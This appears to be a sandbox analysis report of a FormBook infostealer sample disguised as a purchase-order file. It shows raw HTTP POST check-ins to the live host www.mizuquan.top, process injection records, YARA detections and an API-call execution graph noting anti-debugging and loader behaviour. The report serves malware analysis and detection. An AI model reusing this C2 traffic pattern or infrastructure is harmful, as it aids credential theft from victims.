                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mizuquan.top
                      Origin: http://www.mizuquan.top
                      Referer: http://www.mizuquan.top/ed2j/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4b 38 5a 50 68 79 6a 4f 59 38 70 66 76 53 79 4c 44 55 44 63 4d 6e 2f 51 5a 64 54 36 5a 74 2f 51 47 52 2b 66 46 43 62 52 41 37 57 75 46 61 4f 77 52 2b 35 62 66 54 4a 72 44 37 50 68 32 54 62 34 6e 43 4d 79 7a 58 7a 59 75 71 4e 6b 37 77 42 30 43 7a 52 75 55 65 38 58 30 4d 59 54 66 67 2f 69 66 6c 4c 6e 64 57 6c 37 42 46 5a 42 32 52 45 53 48 79 2f 63 79 48 7a 57 36 43 62 37 6a 6c 79 53 47 74 65 58 35 4d 75 41 74 54 54 30 78 58 6e 6f 33 44 36 68 42 56 53 2f 59 34 69 68 50 6a 74 2b 66 5a 2f 69 6f 70 74 76 62 35 75 6c 64 7a 76 72 4b 6d 33 6a 77 3d 3d
                      Data Ascii: chHT=Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hBVS/Y4ihPjt+fZ/ioptvb5uldzvrKm3jw==
                      Sep 10, 2024 08:50:31.342704058 CEST | 691 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:50:31 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      34 | 192.168.2.4 | 49771 | 43.242.202.169 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:33.024079084 CEST | 742 | OUT | POST /ed2j/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mizuquan.top
                      Origin: http://www.mizuquan.top
                      Referer: http://www.mizuquan.top/ed2j/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 64 2f 54 6e 68 2b 52 6b 43 62 53 41 37 57 68 6c 62 45 74 42 2f 33 62 66 58 33 72 43 48 50 68 32 48 62 34 6c 61 4d 6e 51 76 77 62 65 71 4c 69 37 77 48 70 53 7a 52 75 55 65 38 58 30 59 79 54 62 4d 2f 69 73 74 4c 6d 34 37 7a 6e 78 46 65 4c 57 52 45 59 58 7a 30 63 79 47 6b 57 2f 61 78 37 67 4e 79 53 47 64 65 5a 49 4d 74 4a 74 54 56 77 78 57 76 70 43 6a 30 35 53 30 45 77 37 30 31 67 4f 58 2b 79 35 49 6c 7a 5a 49 36 39 62 64 64 34 61 36 62 6d 4a 62 2b 34 38 35 6c 71 66 47 79 72 54 69 68 70 6f 4b 4f 6c 72 64 45 71 34 59 3d
                      Data Ascii: chHT=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vd/Tnh+RkCbSA7WhlbEtB/3bfX3rCHPh2Hb4laMnQvwbeqLi7wHpSzRuUe8X0YyTbM/istLm47znxFeLWREYXz0cyGkW/ax7gNySGdeZIMtJtTVwxWvpCj05S0Ew701gOX+y5IlzZI69bdd4a6bmJb+485lqfGyrTihpoKOlrdEq4Y=
                      Sep 10, 2024 08:50:33.880614042 CEST | 691 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:50:33 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      35 | 192.168.2.4 | 49772 | 43.242.202.169 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:35.569287062 CEST | 10824 | OUT | POST /ed2j/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mizuquan.top
                      Origin: http://www.mizuquan.top
                      Referer: http://www.mizuquan.top/ed2j/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 56 2f 54 55 70 2b 65 6a 2b 62 54 41 37 57 6f 46 62 48 74 42 2f 36 62 62 37 7a 72 43 4c 35 68 30 2f 62 71 32 53 4d 6a 52 76 77 41 4f 71 4c 75 62 77 47 30 43 7a 2b 75 55 75 34 58 30 49 79 54 62 4d 2f 69 74 64 4c 77 64 58 7a 6c 78 46 5a 42 32 52 59 53 48 7a 63 63 79 76 52 57 2b 75 4c 36 51 74 79 52 6d 4e 65 55 65 34 74 49 4e 54 58 31 78 58 70 70 43 6d 32 35 53 59 2b 77 34 6f 54 67 4f 6a 2b 79 39 35 46 69 4e 55 62 70 71 74 39 6b 4a 69 6b 2f 72 54 61 38 75 4a 70 35 64 33 6d 35 42 57 71 6d 71 72 71 31 34 31 59 6f 6f 36 56 6d 69 6f 49 50 73 6f 4e 43 75 61 45 46 77 46 6a 31 42 31 6e 41 57 4c 2f 6d 47 50 69 41 59 63 6e 37 61 76 5a 32 4e 6a 6c 46 56 71 2f 65 56 44 6c 55 45 64 46 49 65 6c 2b 2f 55 70 53 44 46 4d 34 37 56 78 65 32 56 34 4b 39 58 52 48 43 39 46 34 6f 2b 64 2f 4a 76 61 58 68 52 39 30 75 4a 38 6c 66 69 42 6b 64 6d 50 4d 46 42 58 6c 30 50 34 72 4a 47 56 34 76 [TRUNCATED]
                      Data Ascii: chHT=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 [TRUNCATED]
                      Sep 10, 2024 08:50:36.650837898 CEST | 691 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:50:36 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      36 | 192.168.2.4 | 49773 | 43.242.202.169 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:38.113784075 CEST | 459 | OUT | GET /ed2j/?chHT=HnYP2yoU4dt40olvIDuXD48kL/PNXzgkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjaKCOmMM/uBzrxUijYkdqZPZsj8JBjY2qkwg=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.mizuquan.top
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:50:38.979907036 CEST | 691 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:50:38 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Target ID:0
                      Start time:02:47:35
                      Start date:10/09/2024
                      Path:C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
                      Imagebase:0x2b0000
                      File size:1'220'608 bytes
                      MD5 hash:C029364519D917E71EC6E8BE9301755B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:1
                      Start time:02:47:36
                      Start date:10/09/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
                      Imagebase:0xb50000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      Target ID:2
                      Start time:02:47:46
                      Start date:10/09/2024
                      Path:C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe"
                      Imagebase:0x4e0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:3
                      Start time:02:47:47
                      Start date:10/09/2024
                      Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                      Imagebase:0x310000
                      File size:478'720 bytes
                      MD5 hash:6599A09C160036131E4A933168DA245F
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      Target ID:7
                      Start time:02:48:01
                      Start date:10/09/2024
                      Path:C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe"
                      Imagebase:0x4e0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:8
                      Start time:02:48:17
                      Start date:10/09/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff6bf500000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                        Execution Graph

                        Execution Coverage:3.1%
                        Dynamic/Decrypted Code Coverage:1.1%
                        Signature Coverage:8.5%
                        Total number of Nodes:1642
                        Total number of Limit Nodes:145
                        execution_graph 102806 32a0a7 102810 2faf66 102806->102810 102808 32a0b2 102809 2faf66 84 API calls 102808->102809 102809->102808 102815 2faf73 102810->102815 102820 2fafa0 102810->102820 102811 2fafa2 102851 2cf833 81 API calls 102811->102851 102813 2fafa7 102821 2b84a6 102813->102821 102815->102811 102815->102813 102818 2faf9a 102815->102818 102815->102820 102816 2fafae 102841 2b7b4b 102816->102841 102850 2c4265 61 API calls _memmove 102818->102850 102820->102808 102822 2b84be 102821->102822 102839 2b84ba 102821->102839 102823 2b84ea __itow Mailbox _wcscpy 102822->102823 102824 325592 __i64tow 102822->102824 102825 325494 102822->102825 102826 2b84d2 102822->102826 102853 2d010a 102823->102853 102827 32557a 102825->102827 102828 32549d 102825->102828 102852 2d234b 80 API calls 3 library calls 102826->102852 102866 2d234b 80 API calls 3 library calls 102827->102866 102828->102823 102833 3254bc 102828->102833 102832 2b84f4 102832->102839 102862 2bcaee 102832->102862 102834 2d010a 48 API calls 102833->102834 102836 3254d9 102834->102836 102837 2d010a 48 API calls 102836->102837 102838 3254ff 102837->102838 102838->102839 102840 2bcaee 48 API calls 102838->102840 102839->102816 102840->102839 102842 2b7b5d 102841->102842 102843 32240d 102841->102843 102889 2bbbd9 102842->102889 102895 2ec0a2 48 API calls _memmove 102843->102895 102846 2b7b69 102846->102820 102847 322417 102896 2bc935 48 API calls 102847->102896 102849 32241f Mailbox 102850->102820 102851->102813 102852->102823 102856 2d0112 __calloc_impl 102853->102856 102855 2d012c 102855->102832 102856->102855 102857 2d012e std::exception::exception 102856->102857 102867 2d45ec 102856->102867 102881 2d7495 RaiseException 102857->102881 102859 2d0158 102882 2d73cb 47 API calls _free 102859->102882 102861 2d016a 102861->102832 102863 2bcafd __wsetenvp _memmove 102862->102863 102864 2d010a 48 API calls 102863->102864 102865 2bcb3b 102864->102865 102865->102839 102866->102823 102868 2d4667 
Execution Graph (flattened rendering of the interactive graph; the raw node-id / block-address / edge listing is not reproduced here). Each node in the source is a basic-block address followed by the API names called from that block; an annotation such as "47 API calls" marks a collapsed callee; names like __calloc_impl, __mtinitlocknum, _wparse_cmdline and __wsetenvp are the sample's statically linked MSVC CRT, and GetPEB is the sandbox's label for a direct PEB read, not a Windows export.

API calls recoverable from the graph, grouped by purpose:

Main image, 0x2b1000 - 0x3267e8:
- CRT start-up and heap: GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetStdHandle, GetFileType, RtlAllocateHeap, RtlFreeHeap, GetLastError, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, GetModuleHandleExW
- Environment and version probing: GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA / LoadLibraryExW with GetProcAddress and FreeLibrary (APIs resolved at run time rather than imported), and a registry read RegOpenKeyExW -> RegQueryValueExW -> RegCloseKey starting at 0x2cc969
- Anti-debugging: IsDebuggerPresent at 0x2b377f (the positive branch goes to MessageBoxA at 0x3221b7) and again in the CRT security-failure handler at 0x2d797f, followed by SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess and TerminateProcess
- Privilege check and self-relaunch: AllocateAndInitializeSid, CheckTokenMembership, FreeSid at 0x2ebe31, then GetModuleFileNameW, GetForegroundWindow and ShellExecuteW at 0x32226d
- Window, tray icon and message loop: CreateWindowExW, ShowWindow, RegisterWindowMessageW, SetTimer, KillTimer, Shell_NotifyIconW, CreatePopupMenu, DefWindowProcW, PostQuitMessage, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, LockWindowUpdate, DestroyWindow, DestroyIcon, DeleteObject, MoveWindow, SetFocus, LoadStringW, LoadCursorW, LoadIconW, GetSysColorBrush, IsThemeActive, SystemParametersInfoW
- Threads, child processes and timing: CreateThread, CloseHandle, WaitForSingleObject, GetExitCodeProcess, Sleep, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, CoInitialize
- Files, directories and resources: GetOpenFileNameW, SHGetMalloc, GetFullPathNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal

Second region, 0x3bc0000 - 0x3bc34ba (no CRT symbols, and no incoming edge from the main image):
GetPEB -> Sleep -> CreateFileW -> VirtualAlloc -> ReadFile -> (collapsed callee, 13 API calls) -> ExitProcess, with every failure edge from CreateFileW, VirtualAlloc, ReadFile and ExitProcess going to the block at 0x3bc24df. That is the shape of a small loader that reads a file into freshly allocated memory; the graph alone does not identify the file or what the collapsed callee does, so treat that reading as an interpretation, not a finding of the report.
104107 2d4217 104105->104107 104113 2d4227 104106->104113 104124 2d3914 104106->104124 104164 2d889e 47 API calls __getptd_noexit 104107->104164 104109 2d421c 104165 2d7aa0 8 API calls ___strgtold12_l 104109->104165 104123 2d42e3 LeaveCriticalSection LeaveCriticalSection __wfsopen 104113->104123 104117 2d4245 104141 2df782 104117->104141 104119 2d424b 104119->104113 104120 2d28ca _free 47 API calls 104119->104120 104120->104113 104121->104097 104122->104101 104123->104101 104125 2d3927 104124->104125 104129 2d394b 104124->104129 104126 2d35c3 __flush 47 API calls 104125->104126 104125->104129 104127 2d3944 104126->104127 104166 2dbd14 104127->104166 104130 2df8e6 104129->104130 104131 2d423f 104130->104131 104132 2df8f3 104130->104132 104134 2d35c3 104131->104134 104132->104131 104133 2d28ca _free 47 API calls 104132->104133 104133->104131 104135 2d35cd 104134->104135 104136 2d35e2 104134->104136 104272 2d889e 47 API calls __getptd_noexit 104135->104272 104136->104117 104138 2d35d2 104273 2d7aa0 8 API calls ___strgtold12_l 104138->104273 104140 2d35dd 104140->104117 104142 2df78e __mtinitlocknum 104141->104142 104143 2df7ae 104142->104143 104144 2df796 104142->104144 104145 2df82b 104143->104145 104150 2df7d8 104143->104150 104289 2d886a 47 API calls __getptd_noexit 104144->104289 104293 2d886a 47 API calls __getptd_noexit 104145->104293 104147 2df79b 104290 2d889e 47 API calls __getptd_noexit 104147->104290 104149 2df830 104294 2d889e 47 API calls __getptd_noexit 104149->104294 104153 2db6a0 ___lock_fhandle 49 API calls 104150->104153 104155 2df7de 104153->104155 104154 2df838 104295 2d7aa0 8 API calls ___strgtold12_l 